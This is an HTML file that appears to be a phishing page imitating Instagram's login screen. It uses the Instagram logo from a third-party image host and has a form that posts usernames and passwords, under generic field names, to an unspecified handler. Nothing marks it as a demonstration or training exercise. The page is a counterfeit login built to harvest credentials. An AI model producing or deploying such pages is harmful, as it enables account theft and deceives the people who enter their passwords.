<!DOCTYPE html>
<html lang="en">
<head>
    <title>Document</title>

<style>
body{
width:100%;
margin:0;
background:rgb(255,255,255);
padding:0;

}
.insta{
width:180px;
height:auto;

}

.in{
position:relative;
top:10px;
left:0;
width:340px;
height:20px;
padding:8px;
color:#a4a4a4;
border:none;
outline:none;
border:1.5px solid #a4a4a4;
border-radius:5px;
}

.in:hover{
position:relative;
top:10px;
left:0;
width:340px;
height:20px;
padding:8px;
color:#a4a4a4;
border:none;
outline:none;
border:2.5px solid #a4a4a4;
border-radius:5px;
}



.inb{
position:relative;
top:-10px;
left:0;
width:330px;
height:40px;
padding:9px;
background:rgb(178,223,252);
color:white;
border:none;
outline:none;
border-radius:5px;
}

.inb:hover{
position:relative;
top:-10px;
left:0;
width:330px;
height:40px;
padding:9px;
background:#356491;
color:white;
border:none;
outline:none;
border-radius:5px;
}
.p{
color:#a4a4a4;
float:left;
font-size:12px;
position:relative;
top:15px;
left:20px;
}
.hh{
width:400px;

}
.pp{
color:#a4a4a4;
font-size:12px;
position:relative;
top:5px;
left:0;
}
.hh{
width:400px;

}
</style>
</head>
<body>
<center>
<p class="pp">English (US) • <span style="color:#66a2bb">More</span></p>
<div class="hh">

<image src="https://www.linkpicture.com/q/FileInstagram-logosvg-Wikimedia-Commons-0X2OWa4wSUe5UM_1.jpg"class="insta"></image>
<br>
<p class="p">Enter your mobil number , emial , username</p><br>
<form action="" method="post">
<input type="text"class="in" name="data1"></input><br>
<p class="p">Enter your passowrd</p><br>
<input type="password"class="in" name="data2"></input><br><br><br>
<input type="submit"class="inb" value="login" name="button"></input>
</form>

<br>
<p class="pp">Forget your login details? <span style="color:#4d7daa;font-weight:bold;">Get help logining in</span></p>
<br><br>
<p class="pp">OR</p>
<p class="pp">Don't have an account? <span style="color:#4d7daa;font-weight:bold;">Sign up</span></p>
</div>
</center>
</body>
</html>
